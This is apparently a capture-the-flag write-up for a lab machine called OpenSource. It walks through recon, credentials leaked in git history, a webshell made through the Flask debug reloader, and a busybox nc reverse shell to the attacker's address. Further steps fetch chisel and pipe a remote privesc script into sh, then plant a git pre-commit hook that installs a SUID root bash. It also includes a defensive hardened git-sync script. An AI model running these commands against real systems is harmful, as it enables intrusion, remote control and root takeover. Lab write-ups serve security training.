OpenSource

Recon

nmap_scan.log
Open 10.129.227.140:22
Open 10.129.227.140:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.227.140

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOm3Ocn3qQzvKFsAf8u2wdkpi0XryPX5W33bER74CfZxc4QPasF+hGBNSaCanZpccGuPffJ9YenksdoTNdf35cvhamsBUq6TD88Cyv9Qs68kWPJD71MkSDgoyMFIe7NTdzyWJJjmUcNHRvwfo6KQsVXjwC4MN+SkL6dLfAY4UawSNhJZGTiKu0snAV6TZ5ZYnmDpnKIEZzf/dOK6bBu4SCu9DRjPknuZkl7sKp3VCoI9CRIu1tihqs1NPhFa+XnHSRsULWtQqtmxZP5UXbmgwETxmpfw8M9XcMH0QXr8JSAdDkg2NtIapmPX/a3hVFATYg+idaEEQNlZHPUKLbCTyJ
|   256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLA9ak8TUAPl/F77SPc1ut/8B+eOukyC/0lof4IrqJoPJLYusbXk+9u/OgSGp6bJZhotkJUvhC7k0rsA7WX19Y8=
|   256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINxEEb33GC5nT5IJ/YY+yDpTKQGLOK1HPsEzM99H4KKA
80/tcp open  http    syn-ack Werkzeug httpd 2.1.2 (Python 3.10.3)
|_http-title: upcloud - Upload files for Free!
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Writeup.png

Git

Download the source

└─$ curl -Ls http://10.129.227.140/download -o source.zip
└─$ unzip source.zip -d source

The git history of the dev branch leaks credentials for the user dev01: a removed editor settings file contained a proxy URL with a username and password embedded in it.

└─$ git branch -a      
  dev
* public
└─$ git checkout dev   
Switched to branch 'dev'
└─$ git log --oneline --graph
* c41fede (HEAD -> dev) ease testing
* be4da71 added gitignore
* a76f8f7 updated
* ee9d9f1 initial
└─$ git log -p
...
-{
-  "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
-  "http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/",
-  "http.proxyStrictSSL": false
-}
...

The credentials don't work over SSH; the server only accepts public-key authentication.

└─$ sshpass -p 'Soulless_Developer#2022' ssh dev01@10.129.227.140
dev01@10.129.227.140: Permission denied (publickey).

RCE

Because the application is running in debug mode, we can overwrite the source files it is using and the debugger's reloader will pick up the changes. That means we can add something like a custom route and make it act as a webshell.

Writeup-1.png

/bin/bash doesn't exist, so we use /bin/sh. Since we are inside a container, busybox also exists and it supports nc.

Note: `which <program>` checks whether a binary exists.

└─$ curl http://10.129.227.140/letmein --data-urlencode '0=busybox nc 10.10.14.113 4444 -e /bin/sh'

Reverse Shell

└─$ nc -lvnp 4444
Ncat: Connection from 10.129.227.140:46167.
/bin/sh -i
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

There's another host on the container network:

/app # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:03
          inet addr:172.17.0.3  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:822 errors:0 dropped:0 overruns:0 frame:0
          TX packets:638 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:80745 (78.8 KiB)  TX bytes:330515 (322.7 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
/app # arp -a
? (172.17.0.1) at 02:42:11:8f:39:87 [ether]  on eth0

Upgrade shell: https://book.hacktricks.xyz/sw/generic-methodologies-and-resources/reverse-shells/full-ttys#python

python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
~ # for port in $(seq 1 10000); do busybox nc -w 1 -zv 172.17.0.1 $port; done;
172.17.0.1 (172.17.0.1:22) open
172.17.0.1 (172.17.0.1:80) open
172.17.0.1 (172.17.0.1:3000) open
172.17.0.1 (172.17.0.1:6000) open
172.17.0.1 (172.17.0.1:6001) open
172.17.0.1 (172.17.0.1:6002) open
172.17.0.1 (172.17.0.1:6003) open
172.17.0.1 (172.17.0.1:6004) open
172.17.0.1 (172.17.0.1:6005) open
172.17.0.1 (172.17.0.1:6006) open
172.17.0.1 (172.17.0.1:6007) open

Ports 6000-6007 are odd, but they seem to serve the same application as port 80.

~ # wget 172.17.0.1:6000 -qO- |md5sum
29d49d811ecc01bb34af7b5a5f73408f  -
~ # wget 172.17.0.1:6001 -qO- |md5sum
29d49d811ecc01bb34af7b5a5f73408f  -
~ # wget 172.17.0.1:6002 -qO- |md5sum
29d49d811ecc01bb34af7b5a5f73408f  -
~ # wget 172.17.0.1 -qO- |md5sum
29d49d811ecc01bb34af7b5a5f73408f  -

Port 3000 is different:

~ # wget 172.17.0.1:3000 -qO- |md5sum
5bf013873bbead3add84a3f2f7c8b19c  -

It seems to be a Gitea instance:

~ # wget 172.17.0.1:3000 -qO-  |grep Gitea
        <title> Gitea: Git with a cup of tea</title>
        <meta name="author" content="Gitea - Git with a cup of tea" />
        <meta name="description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go" />
        <meta property="og:title" content="Gitea: Git with a cup of tea">
        <meta property="og:description" content="Gitea (Git with a cup of tea) is a painless self-hosted Git service written in Go">
<meta property="og:site_name" content="Gitea: Git with a cup of tea" />
                                        Gitea: Git with a cup of tea
                                Gitea runs anywhere <a target="_blank" rel="noopener noreferrer nofollow" href="http://golang.org/">Go</a> can compile for: Windows, macOS, Linux, ARM, etc. Choose the one you love!
                                Gitea has low minimal requirements and can run on an inexpensive Raspberry Pi. Save your machine energy!
                        Powered by Gitea Version: 1.16.6 Page: <strong>1ms</strong> Template: <strong>1ms</strong>

Let's port forward it with Chisel. One odd thing during testing was that any request going to port 80 was going to the main server?? It was my IP, but it was still going to its own port 80, and like, wtf? Changing the port got a callback.

└─$ chisel server -p 36000 --reverse
---
/tmp # wget http://10.10.14.113:8000/chisel -q -O /tmp/chisel
/tmp # chmod +x /tmp/chisel
/tmp # /tmp/chisel client 10.10.14.113:36000 R:3000:172.17.0.1:3000 &

We can create an account, but that gets us nothing.

Writeup-2.png

Previously found credentials work.

Creds: dev01:Soulless_Developer#2022

Writeup-3.png

SSH (22)

Using the SSH key works.

└─$ nano dev01.id_rsa
└─$ chmod 600 *.id_rsa
└─$ ssh -i dev01.id_rsa dev01@10.129.227.140
dev01@opensource:~$ id
uid=1000(dev01) gid=1000(dev01) groups=1000(dev01)

User.txt

dev01@opensource:~$ cat user.txt
30650232b08f7d0374680472a04d7b32

Privilege Escalation

No sudo privs.

dev01@opensource:~$ curl 10.10.14.113/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Executable files potentially added by user (limit 70)
2022-03-23+00:26:19.9865825590 /usr/local/bin/git-sync
2022-03-21+22:12:49.1495633880 /opt/gitlab/sv/grafana/log/run
2022-03-21+22:12:49.0935625310 /opt/gitlab/sv/grafana/run
...
dev01@opensource:~$ cat /usr/local/bin/git-sync
#!/bin/bash

cd /home/dev01/

if ! git status --porcelain; then
    echo "No changes"
else
    day=$(date +'%Y-%m-%d')
    echo "Changes detected, pushing.."
    git add .
    git commit -m "Backup for ${day}"
    git push origin main
fi

git status shows the changes made inside the home directory (because it contains a .git), but the script's test is wrong: `git status --porcelain` exits 0 whether or not there are changes, so the `if !` branch never fires and the else branch (add, commit, push) runs every time. The job also runs as root inside a repository owned by dev01, so the repository's hooks run as root.
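A hardened replacement for the git-sync job, as an added example (this is not the script found on the box or any project's code). It keeps the original's assumptions (root cron job, repository at /home/dev01, remote "origin", branch "main") and fixes the two defects above: the dirty check looks at the porcelain output instead of the exit status, and git is run with hooks disabled and, when started as root, re-executed as the repository owner so nothing under the user-writable .git runs with root privileges. The `run` argument and the REPO_DIR/REPO_OWNER variables are this example's own conventions.

```shell
#!/bin/bash
# Hardened git-sync backup job (added example, not the original script).
# Cron invocation assumed by this example: /usr/local/bin/git-sync run
set -u

REPO_DIR="${REPO_DIR:-/home/dev01}"    # repository path from the original script
REPO_OWNER="${REPO_OWNER:-dev01}"      # owner of that repository

# `git status --porcelain` exits 0 whether or not the tree is dirty; only its
# output (one line per changed or untracked path) tells us. The decision is
# read from stdin so it can be tested without a repository.
has_changes_from_porcelain() {
    [ -n "$(cat)" ]
}

# Run git inside the repo without executing repository-controlled code:
#  - core.hooksPath=/dev/null: no hook can exist under /dev/null, so
#    pre-commit and friends never run;
#  - a command-line -c overrides the user-writable .git/config.
# The owner can still edit .git/config (other executable settings live
# there), so the robust fix is to run the whole job as the owner (see main).
safe_git() {
    git -C "$REPO_DIR" -c core.hooksPath=/dev/null "$@"
}

repo_has_changes() {
    safe_git status --porcelain | has_changes_from_porcelain
}

sync_repo() {
    if ! repo_has_changes; then
        echo "No changes"
        return 0
    fi
    day=$(date +'%Y-%m-%d')
    echo "Changes detected, pushing.."
    safe_git add .
    safe_git commit -m "Backup for ${day}"
    safe_git push origin main
}

# If cron started us as root, drop to the repository owner before touching it.
main() {
    if [ "$(id -u)" -eq 0 ]; then
        exec runuser -u "$REPO_OWNER" -- "$0" "$@"
    fi
    sync_repo
}

# Only act when explicitly told to, so the functions can be sourced and tested.
case "${1:-}" in
    run) main "$@" ;;
esac
```

Running the job as dev01 means a hook planted in ~/.git/hooks executes only with dev01's own privileges, which removes the privilege escalation even if the dirty check were still wrong.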

dev01@opensource:~$ echo x > x
dev01@opensource:~$ git status --porcelain;
?? x

We could confirm the trigger with ps or pspy, but it is most probably a cron job.

https://gtfobins.github.io/gtfobins/git/ (d)

dev01@opensource:~$ echo $'#!/bin/bash\ninstall -m4777 /bin/bash /tmp/rootbash' > ~/.git/hooks/pre-commit
dev01@opensource:~$ chmod +x ~/.git/hooks/pre-commit

After some time:

dev01@opensource:~$ ls -l /tmp/rootbash
-rwsrwxrwx 1 root root 1113504 Dec 14 18:40 /tmp/rootbash
dev01@opensource:~$ /tmp/rootbash -p
rootbash-4.4# id
uid=1000(dev01) gid=1000(dev01) euid=0(root) groups=1000(dev01)

Root.txt

rootbash-4.4# cat /root/root.txt
885d562e2cb9693f8f42855cea2a18ef
